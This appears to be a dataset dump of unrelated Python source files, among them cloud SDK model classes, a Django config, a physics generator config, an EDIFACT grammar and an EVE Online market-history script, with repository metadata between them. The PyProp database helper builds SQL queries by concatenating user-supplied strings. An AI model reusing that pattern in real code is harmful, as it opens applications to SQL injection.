dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
name = dictionary.get('name')
product_version = dictionary.get('productVersion')
mtype = dictionary.get('type')
uuid = dictionary.get('uuid')
# Return an object of this model
return cls(name,
product_version,
mtype,
uuid)
| [
"ashish@cohesity.com"
] | ashish@cohesity.com |
0ba165016674eb6222d4c715824556f5bce78ae5 | b3cb41c81069ad2e447a7bab98fd269235996a51 | /pyprop/base_classes.py | 7a2ee646915c15f7198c3e7beb8fc07645d42ef2 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | usuaero/PyProp | e289e8bd64d2d0db51547a808a1f019b37b14fc4 | e568dda610632adf1ab208a6861cca8d8dd84e75 | refs/heads/master | 2023-06-03T01:35:08.525608 | 2021-06-21T16:45:51 | 2021-06-21T16:45:51 | 280,196,572 | 15 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,029 | py | """Defines base classes for the module."""
import os
import sqlite3 as sql
import numpy as np
from .exceptions import DatabaseRecordNotFoundError
class DatabaseComponent:
"""A component defined in the database. DEPRECIATED"""
def __init__(self):
# Get database file
self._db_file = os.path.join(os.path.dirname(__file__), "components.db")
# Set up params
self._table_names = {
"battery" : "Batteries",
"ESC" : "ESCs",
"motor" : "Motors",
"prop" : "Props"
}
def get_database_record(self, component_type, **kwargs):
"""Extracts a record from the database."""
# Get kwargs
name = kwargs.get("name", None)
manufacturer = kwargs.get("manufacturer", None)
dbid = kwargs.get("dbid", None)
capacity = kwargs.get("capacity", None)
I_max = kwargs.get("I_max", None)
Kv = kwargs.get("Kv", None)
diameter = kwargs.get("diameter", None)
pitch = kwargs.get("pitch", None)
# Get database location and connection
with sql.connect(self._db_file) as conn:
db_cur = conn.cursor()
# Format command generically
table_name = self._table_names[component_type]
command = "select * from {0}".format(table_name)
if name is not None:
if manufacturer is not None or dbid is not None:
raise ValueError("Too many {0} parameters specified.".format(component_type))
command = command+" where Name = '"+name+"'"
elif manufacturer is not None:
if dbid is not None:
raise ValueError("Too many {0} parameters specified.".format(component_type))
command = command+" where manufacturer = '"+manufacturer+"'"
elif dbid is not None:
command = command+" where id = "+str(dbid)
# Add component-specific commands
if component_type == "battery" and capacity is not None:
command = command+" order by abs("+str(capacity)+"-Capacity)"
if component_type == "ESC" and I_max is not None:
command = command+" order by abs("+str(I_max)+"-I_motorax)"
if component_type == "motor" and Kv is not None:
command = command+" order by abs("+str(Kv)+"-kv)"
if component_type == "prop" and diameter is not None:
command = command+" order by abs("+str(diameter)+"-Diameter)"
if component_type == "prop" and pitch is not None:
command = command+" order by abs("+str(pitch)+"-Pitch)"
# Get in random order
command = command+" order by RANDOM() limit 1"
# Get record
db_cur.execute(command)
try:
record = np.asarray(db_cur.fetchall())[0]
except IndexError:
raise DatabaseRecordNotFoundError(command)
return record | [
"cory.goates@aggiemail.usu.edu"
] | cory.goates@aggiemail.usu.edu |
7d1d99a28afe14d7c950a3227568d2d3fb4498eb | 8f4f9a07fa25490289b76253971b2ae8c386e8cd | /huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/show_project_work_hours_response_body_work_hours.py | e4f1bf100e9079db62922dcdfeab16b27c2c9772 | [
"Apache-2.0"
] | permissive | xingkongcwb/huaweicloud-sdk-python-v3 | 5c635af84a9fb4fb37c45a8de38f691724ca5e31 | 007d5c54ff71f0a2d7b52dcc53e3d38dec4fe775 | refs/heads/master | 2023-03-23T09:56:10.606710 | 2021-03-19T12:47:29 | 2021-03-19T12:47:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,094 | py | # coding: utf-8
import pprint
import re
import six
class ShowProjectWorkHoursResponseBodyWorkHours:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'project_name': 'str',
'nick_name': 'str',
'user_name': 'str',
'work_time': 'str',
'work_hours_num': 'str',
'summary': 'str',
'work_hours_type_name': 'str',
'issue_id': 'int',
'issue_type': 'str',
'subject': 'str',
'created_time': 'str',
'closed_time': 'str'
}
attribute_map = {
'project_name': 'project_name',
'nick_name': 'nick_name',
'user_name': 'user_name',
'work_time': 'work_time',
'work_hours_num': 'work_hours_num',
'summary': 'summary',
'work_hours_type_name': 'work_hours_type_name',
'issue_id': 'issue_id',
'issue_type': 'issue_type',
'subject': 'subject',
'created_time': 'created_time',
'closed_time': 'closed_time'
}
def __init__(self, project_name=None, nick_name=None, user_name=None, work_time=None, work_hours_num=None, summary=None, work_hours_type_name=None, issue_id=None, issue_type=None, subject=None, created_time=None, closed_time=None):
"""ShowProjectWorkHoursResponseBodyWorkHours - a model defined in huaweicloud sdk"""
self._project_name = None
self._nick_name = None
self._user_name = None
self._work_time = None
self._work_hours_num = None
self._summary = None
self._work_hours_type_name = None
self._issue_id = None
self._issue_type = None
self._subject = None
self._created_time = None
self._closed_time = None
self.discriminator = None
if project_name is not None:
self.project_name = project_name
if nick_name is not None:
self.nick_name = nick_name
if user_name is not None:
self.user_name = user_name
if work_time is not None:
self.work_time = work_time
if work_hours_num is not None:
self.work_hours_num = work_hours_num
if summary is not None:
self.summary = summary
if work_hours_type_name is not None:
self.work_hours_type_name = work_hours_type_name
if issue_id is not None:
self.issue_id = issue_id
if issue_type is not None:
self.issue_type = issue_type
if subject is not None:
self.subject = subject
if created_time is not None:
self.created_time = created_time
if closed_time is not None:
self.closed_time = closed_time
@property
def project_name(self):
"""Gets the project_name of this ShowProjectWorkHoursResponseBodyWorkHours.
        Project name
:return: The project_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._project_name
@project_name.setter
def project_name(self, project_name):
"""Sets the project_name of this ShowProjectWorkHoursResponseBodyWorkHours.
        Project name
:param project_name: The project_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._project_name = project_name
@property
def nick_name(self):
"""Gets the nick_name of this ShowProjectWorkHoursResponseBodyWorkHours.
        User nickname
:return: The nick_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._nick_name
@nick_name.setter
def nick_name(self, nick_name):
"""Sets the nick_name of this ShowProjectWorkHoursResponseBodyWorkHours.
        User nickname
:param nick_name: The nick_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._nick_name = nick_name
@property
def user_name(self):
"""Gets the user_name of this ShowProjectWorkHoursResponseBodyWorkHours.
        Username
:return: The user_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._user_name
@user_name.setter
def user_name(self, user_name):
"""Sets the user_name of this ShowProjectWorkHoursResponseBodyWorkHours.
        Username
:param user_name: The user_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._user_name = user_name
@property
def work_time(self):
"""Gets the work_time of this ShowProjectWorkHoursResponseBodyWorkHours.
        Date of the logged work hours
:return: The work_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._work_time
@work_time.setter
def work_time(self, work_time):
"""Sets the work_time of this ShowProjectWorkHoursResponseBodyWorkHours.
        Date of the logged work hours
:param work_time: The work_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._work_time = work_time
@property
def work_hours_num(self):
"""Gets the work_hours_num of this ShowProjectWorkHoursResponseBodyWorkHours.
        Number of work hours spent
:return: The work_hours_num of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._work_hours_num
@work_hours_num.setter
def work_hours_num(self, work_hours_num):
"""Sets the work_hours_num of this ShowProjectWorkHoursResponseBodyWorkHours.
        Number of work hours spent
:param work_hours_num: The work_hours_num of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._work_hours_num = work_hours_num
@property
def summary(self):
"""Gets the summary of this ShowProjectWorkHoursResponseBodyWorkHours.
        Description of the logged work hours
:return: The summary of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._summary
@summary.setter
def summary(self, summary):
"""Sets the summary of this ShowProjectWorkHoursResponseBodyWorkHours.
        Description of the logged work hours
:param summary: The summary of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._summary = summary
@property
def work_hours_type_name(self):
"""Gets the work_hours_type_name of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work hours type
:return: The work_hours_type_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._work_hours_type_name
@work_hours_type_name.setter
def work_hours_type_name(self, work_hours_type_name):
"""Sets the work_hours_type_name of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work hours type
:param work_hours_type_name: The work_hours_type_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._work_hours_type_name = work_hours_type_name
@property
def issue_id(self):
"""Gets the issue_id of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item ID
:return: The issue_id of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: int
"""
return self._issue_id
@issue_id.setter
def issue_id(self, issue_id):
"""Sets the issue_id of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item ID
:param issue_id: The issue_id of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: int
"""
self._issue_id = issue_id
@property
def issue_type(self):
"""Gets the issue_type of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item type
:return: The issue_type of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._issue_type
@issue_type.setter
def issue_type(self, issue_type):
"""Sets the issue_type of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item type
:param issue_type: The issue_type of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._issue_type = issue_type
@property
def subject(self):
"""Gets the subject of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item title
:return: The subject of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._subject
@subject.setter
def subject(self, subject):
"""Sets the subject of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item title
:param subject: The subject of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._subject = subject
@property
def created_time(self):
"""Gets the created_time of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item creation time
:return: The created_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._created_time
@created_time.setter
def created_time(self, created_time):
"""Sets the created_time of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item creation time
:param created_time: The created_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._created_time = created_time
@property
def closed_time(self):
"""Gets the closed_time of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item close time
:return: The closed_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._closed_time
@closed_time.setter
def closed_time(self, closed_time):
"""Sets the closed_time of this ShowProjectWorkHoursResponseBodyWorkHours.
        Work item close time
:param closed_time: The closed_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._closed_time = closed_time
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowProjectWorkHoursResponseBodyWorkHours):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
6e6bf914dfaee1862233e9ebd1d7c098ce31e25f | 3e64d1fb4998fae24a4178d0925e0f30e30b00e7 | /venv/lib/python3.8/encodings/cp865.py | 014cd909c595f80e7cacbec3102e9381da502f7e | [] | no_license | viraatdas/Model-Rest-API | a39e150c484c7136141f462932d741de5b45e044 | a08500a28e4ad32094de6f88223088b9a9081d69 | refs/heads/master | 2022-11-12T15:33:06.624474 | 2020-07-05T05:04:50 | 2020-07-05T05:04:50 | 257,821,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | /Library/Frameworks/Python.framework/Versions/3.8/lib/python3.8/encodings/cp865.py | [
"viraat.laldas@gmail.com"
] | viraat.laldas@gmail.com |
ac44ea363414b315f23f7fbc15c32734924d4a71 | a635b8d51016220a6d84808def431c27dde41b90 | /libcms/apps/contact_form/apps.py | 6b76faf1767e1218cad4697c9243b233da6b320b | [] | no_license | isergey/chel | aab3ac98ae2a10258f7a5afce88c74f9e13a2d7f | d1a38bfe7ebba80d9c39ae3b0d54ebfd2965046c | refs/heads/master | 2023-07-07T02:13:41.363452 | 2023-06-26T10:25:14 | 2023-06-26T10:25:14 | 3,816,204 | 1 | 0 | null | 2023-03-31T14:52:31 | 2012-03-24T09:33:53 | JavaScript | UTF-8 | Python | false | false | 151 | py | from django.apps import AppConfig
class ContactFormConfig(AppConfig):
name = 'contact_form'
    verbose_name = 'Contact form'
| [
"dostovalov@gmail.com"
] | dostovalov@gmail.com |
861b6bc3e0be629951d00a347532e405e062548d | f68732bc40a7a90c3a1082e4b3a4154518acafbb | /script/dbus/systemBus/power/003_refreshBatteries.py | adf2cc74cbaca7a47c8533a5cd766f34c53db75c | [] | no_license | lizhouquan1017/dbus_demo | 94238a2307e44dabde9f4a4dd0cf8ec217260867 | af8442845e722b258a095e9a1afec9dddfb175bf | refs/heads/master | 2023-02-11T19:46:27.884936 | 2021-01-08T05:27:18 | 2021-01-08T05:27:18 | 327,162,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | # -*- coding: utf-8 -*-
# ****************************************************
# @Test Case ID: 003_refreshBatteries
# @Test Description: Refresh the status of all battery devices
# @Test Condition:
# @Test Step: 1. Refresh the status of all battery devices
# @Test Result: 1. Check that the refresh succeeds;
# @Test Remark:
# @Author: ut000511
# *****************************************************
import pytest
from frame.base import OSBase
from aw.dbus.systemBus import power
class TestCase(OSBase):
def setUp(self):
self.Step("预制条件1:无")
@pytest.mark.public
def test_step(self):
self.Step("步骤1:刷新所有电池设备的状态并检查刷新成功")
power.refreshBatteries()
def tearDown(self):
pass
| [
"lizhouquan@uniontech.com"
] | lizhouquan@uniontech.com |
3e93a618cae2c252cafc5fc47b87b17fe445a0ba | 9b862cc2ca6cc29a6efe4e783165bc51a98c7790 | /pmr2/layer/tests/utility.py | 27627c6d5e1e489890c10628a3f0be94be34068a | [] | no_license | PMR2/pmr2.layer | 5b836f76bc9da676a9fab5c8137ebd788ea77c8e | 394f5b99e1a74169ccddb08aa0b5bf5bc3de513d | refs/heads/master | 2020-05-07T16:23:50.692864 | 2015-07-27T05:42:14 | 2015-07-27T05:42:14 | 6,539,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 724 | py | import zope.interface
from pmr2.layer.utility import ConditionalLayerApplierBase
class IExampleTestLayer(zope.interface.Interface):
"""Example."""
class ITestLayer1(zope.interface.Interface):
pass
class ITestLayer2(zope.interface.Interface):
pass
class ITestLayer3(ITestLayer1):
pass
class TestLayerApplier(ConditionalLayerApplierBase):
layer = IExampleTestLayer
def condition(self, request):
return 'application/vnd.example.com-v1' in request['HTTP_ACCEPT']
class MultiTestLayerApplier(ConditionalLayerApplierBase):
layer = [ITestLayer1, ITestLayer2, ITestLayer3]
def condition(self, request):
return 'application/vnd.example.com.tests' in request['HTTP_ACCEPT']
| [
"tommy.yu@auckland.ac.nz"
] | tommy.yu@auckland.ac.nz |
693f0a7d80d1732bf677a85c6e6d48f3da5d0d1e | e61e946169b26be9738ba55feb532a4f68844cf6 | /rovid19/urls.py | a0c0d1454a686358a987fa45695bf6f9cd7b809c | [] | no_license | vtemian/rovid19 | 0971c0b0b9c6cd509a93aafb5e298363f36df993 | 0adc193c1ac0c8e3d765d78bd30c08e72af2a60b | refs/heads/master | 2021-09-25T08:08:56.570466 | 2020-03-09T11:56:54 | 2020-03-09T11:59:11 | 246,023,084 | 1 | 0 | null | 2021-09-22T18:42:59 | 2020-03-09T11:55:21 | Python | UTF-8 | Python | false | false | 940 | py | """rovid19 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rest_framework import routers
from cases.api import views
router = routers.DefaultRouter()
router.register(r'cases', views.CasesViewSet)
urlpatterns = [
path('', include(router.urls)),
path('admin/', admin.site.urls),
]
| [
"vladtemian@gmail.com"
] | vladtemian@gmail.com |
049b6e36c7996d5ca9afedd1bdd9f3df9cf8f786 | 418bb4401b66d2edd6195a3a1b16177a1c341f35 | /paras.py | b0598444d917836404277ca111a72b8bc693fa35 | [] | no_license | victorsoda/TrafficAnalysis | 1cadc55cd82fe1a936af619fad3269d6466ca078 | ce61d8c60aad972ea8ed9c255e50317879a62dba | refs/heads/master | 2021-04-03T09:39:44.882831 | 2019-03-07T08:07:56 | 2019-03-07T08:07:56 | 124,986,491 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | import pprint
import numpy as np
data_path = './data/'
volume_file = data_path + 'volume.csv'
travel_time_file = data_path + 'travel_time.csv'
road_id_travel_time_file = data_path + 'road_id_travel_time.csv'
ssid2_road_id_file = data_path + 'ssidA&B_road_id.csv'
lane_direction_file = data_path + 'lane_direction.csv'
origin_data_file = data_path + 'origin_data.csv' # the generated initial data file
door_data_file = data_path + 'door_data.csv' # data output by create_examples on the door-opening video from the original code, used to verify the correctness of pursuit
example_data_file = data_path + 'example_data.txt' # file generated by create_examples
result_recorder_file = data_path + 'result_recorder.txt'
TIME_SLICE = 5 # the Xuancheng dataset uses 5-minute time slices
INF = 1e10
pp = pprint.PrettyPrinter()
# print(origin_data_file[:-4])
# a = np.zeros((8, 2))
# print(a)
# row = np.array([0, 0, 1, 1, 0])
# print(list(row) * 4)
# # ind = [2, 3]
# a = {2, 3}
# [x for x in ] += 1
# print(row)
# action_index = np.where(np.array(row) == 1)
# action_index = [x + 1 for x in action_index[0]]
# print(action_index)
# t_val = np.array([[11, 12, 13, 14, 15, 16, 17],
# [21, 22, 23, 24, 25, 26, 27],
# [31, 32, 33, 34, 35, 36, 37]])
# print(t_val[:, 0:3])
# print(t_val[:, 3:])
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
63691433bc972e320295650c2478b9ec64b6db2c | 3b60e6f4bbc011003ac4929f01eb7409918deb79 | /Analysis_v1/Simulation/Pythia/Unparticles/testsplit/testfrag/STest1p5Unp3000p0_M_2000.py | ed61b1033bbad9c751fb25d90d1d0e764933c73e | [] | no_license | uzzielperez/Analyses | d1a64a4e8730325c94e2bc8461544837be8a179d | 1d66fa94763d7847011ea551ee872936c4c401be | refs/heads/master | 2023-02-09T04:54:01.854209 | 2020-09-07T14:57:54 | 2020-09-07T14:57:54 | 120,850,137 | 0 | 0 | null | 2020-06-17T16:48:16 | 2018-02-09T03:14:04 | C++ | UTF-8 | Python | false | false | 1,255 | py | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
maxEventsToPrint = cms.untracked.int32(1),
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(13000.),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'ExtraDimensionsUnpart:ffbar2gammagamma = on',
'ExtraDimensionsUnpart:gg2gammagamma = on',
'ExtraDimensionsUnpart:LambdaU = 3000.0',
'ExtraDimensionsUnpart:lambda = 1.0',
'ExtraDimensionsUnpart:dU = 1.5',
#'ExtraDimensionsUnpart:spinU = 2',
'PhaseSpace:pTHatMin = 70.0',
'PhaseSpace:mHatMin = 2000',
'PhaseSpace:mHatMax = 1',
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters',
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
| [
"uzzie.perez@cern.ch"
] | uzzie.perez@cern.ch |
9245ad3b8c46ec1710475f237f307cd6276b4300 | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D96A/PRODEXD96AUN.py | 24832a41a8fb141359e2e8b5b0172a9e2afcaabf | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 968 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD96AUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 1, MAX: 2},
{ID: 'MEA', MIN: 1, MAX: 1},
{ID: 'NAD', MIN: 1, MAX: 2},
{ID: 'RFF', MIN: 1, MAX: 5, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'IMD', MIN: 1, MAX: 99, LEVEL: [
{ID: 'QTY', MIN: 0, MAX: 10},
{ID: 'LIN', MIN: 0, MAX: 9999, LEVEL: [
{ID: 'GIS', MIN: 0, MAX: 2},
{ID: 'LOC', MIN: 0, MAX: 2},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'MEA', MIN: 0, MAX: 5},
{ID: 'QTY', MIN: 0, MAX: 5},
{ID: 'TDT', MIN: 0, MAX: 5},
{ID: 'RFF', MIN: 0, MAX: 5, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
]},
]},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
88ebbbd5cb8459262007d071855eee9e264076d6 | 382f4acfd565be4aedb07c694e8daa489ff3e70a | /eveutil2/bin/update-markethistory | 1e2c4e1a73d91087594563d88006e87373b3a338 | [] | no_license | electusmatari/legacy | 913c5a9f68074d1fa793b0e3ff76fd3f9c3f481e | 9266e955398a0c8279b82b8347a85d9186a455da | refs/heads/master | 2021-01-22T05:24:13.935562 | 2013-09-29T11:44:19 | 2013-09-29T11:44:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,813 | #!/usr/bin/env python
# CREATE TABLE market_history (
# id SERIAL NOT NULL,
# day DATE NOT NULL,
# regionid BIGINT NOT NULL,
# typeid BIGINT NOT NULL,
# orders BIGINT NOT NULL,
# movement BIGINT NOT NULL,
# max DOUBLE PRECISION NOT NULL,
# avg DOUBLE PRECISION NOT NULL,
# min DOUBLE PRECISION NOT NULL,
# UNIQUE (day, regionid, typeid)
# );
import evelib.newdb as evedb
import emcom.gmi
import datetime
import urllib
import bz2
import StringIO
import csv
import sdb
REGIONS = ['Heimatar', 'Metropolis', 'Molden Heath', 'The Forge']
HISTORIC_URL = "http://export.eve-metrics.com/historic/%s.csv.bz2"
def main():
conn = evedb.connect()
c = conn.cursor()
c.execute("SELECT regionname, regionid FROM ccp.mapregions")
regionids = dict(c.fetchall())
start = datetime.datetime.utcnow() - datetime.timedelta(days=367)
for region in REGIONS:
regionid = regionids[region]
c.execute("SELECT day, typeid FROM market_history "
"WHERE regionid = %s "
" AND day > %s",
(regionid, start))
known_days = {}
for day, typeid in c.fetchall():
known_days.setdefault(typeid, set())
known_days[typeid].add(long(day.strftime("%Y%m%d")))
url = urllib.urlopen(HISTORIC_URL % (regionid,))
rows = csv.reader(StringIO.StringIO(bz2.decompress(url.read())))
for row in rows:
if row[0] == 'type_id':
continue
if len(row) != 7:
print "Bad row: %r" % (row,)
raise RuntimeError()
(type_id, orders, movement, max, avg, min, date) = row
type_id = int(type_id)
orders = long(orders)
movement = long(movement)
max = float(max)
avg = float(avg)
min = float(min)
date = datetime.datetime.strptime(date, "%Y-%m-%d")
if date < start:
continue
datenum = long(date.strftime("%Y%m%d"))
if datenum not in known_days.get(type_id, []):
try:
c.execute("INSERT INTO market_history (day, regionid, "
" typeid, orders, movement, "
" max, avg, min) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)",
(date, regionid, type_id, orders, movement,
max, avg, min))
conn.commit()
except sdb.IntegrityError:
conn.rollback()
# for typerow in emcom.gmi.TYPE_DATA:
# if typerow[1] is not None:
# continue
# for historyrow in evemetrics.history([typerow[0]], regions=REGIONS):
# insert(c, historyrow)
conn.commit()
def isknown(c, day, regionid, typeid):
c.execute("SELECT EXISTS (SELECT * FROM market_history "
"WHERE day = %s "
" AND regionid = %s "
" AND typeid = %s)",
(day, regionid, typeid))
return c.fetchone()[0]
class BZReader(object):
def __init__(self, bzstream, bufsize=1024*1024):
self.bzstream = bzstream
self.bufsize = bufsize
def __iter__(self):
buf = ""
decompress = bz2.BZ2Decompressor()
while True:
bzdata = self.bzstream.read(self.bufsize)
if bzdata == '':
if buf != '':
yield buf + "\n"
return
buf += decompress.decompress(bzdata)
while "\n" in buf:
i = buf.index("\n")
line = buf[:i+1]
buf = buf[i+1:]
yield line
if __name__ == '__main__':
main()
| [
"forcer@forcix.cx"
] | forcer@forcix.cx | |
45837862fda78545ccc443790fea864b972febcf | ffb627b58f0553fc8bf86c0d100db1dde2015cfe | /week 1/day5/9093.py | c1d01d603408c6811fa77bb581e0ac4e16eb00b5 | [] | no_license | DentiQ/CodeTest | a208bb1250e18fca9d336b93a5c2e4807c621866 | a8d21447ad2cefc583b45c437623647abde11d95 | refs/heads/master | 2023-06-04T06:12:33.540950 | 2021-06-30T17:00:24 | 2021-06-30T17:00:24 | 363,316,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | n = int(input())
for i in range(n):
arr = input().split()
ans = []
for word in arr:
ans.append(word[::-1])
print(*ans)
| [
"dentiq0414@gmail.com"
] | dentiq0414@gmail.com |
9aa280d18399f9265f1b7aca41ffadaf74450035 | 781e2692049e87a4256320c76e82a19be257a05d | /assignments/python/wc/src/1378.py | 0e37e33b27dc06733c4d4980b3cd091d677d39e5 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 216 | py | def word_count(phrase):
words = phrase.split()
result = {}
for word in words:
if word in result:
result[word] += 1
else:
result[word] = 1
return result
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
3af9e10c47b578144db49dc4a3c0c93d4a424b09 | e49a07ad215172e9c82cb418b10371bf0ce1c0f7 | /第2章 python核心编程/第1节.python核心编程/02-python高级-2/2-装饰器/04-多个装饰器.py | 12d352b3d7c3d9596c627310543bec4da181c946 | [] | no_license | taogangshow/python_Code | 829c25a7e32ead388c8b3ffa763cb9cf587bfd7b | 4b3d6992ec407d6069f3187ca7e402a14d863fff | refs/heads/master | 2022-12-16T01:26:17.569230 | 2018-11-16T10:07:59 | 2018-11-16T10:07:59 | 157,832,985 | 0 | 1 | null | 2022-11-25T09:55:32 | 2018-11-16T08:00:13 | Python | UTF-8 | Python | false | false | 404 | py | # Define a function to wrap the data
def makeBold(fn):
def wrapped():
return "<b>" + fn() + "</b>"
return wrapped
# Define a function to wrap the data
def makeItalic(fn):
def wrapped():
return "<i>" + fn() + "</i>"
return wrapped
@makeBold #test3 = makeBold(test3)
@makeItalic #test3 = makeItalic(test3)
def test3():
return "hello world-3"
ret = test3()
print(ret)
| [
"cdtaogang@163.com"
] | cdtaogang@163.com |
61a3468700236973c7e5edf3ae96308896fe3265 | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/costmanagement/latest/outputs.py | 4051a81f344790da31f5a8c6ff074ab075ae0551 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 47,672 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
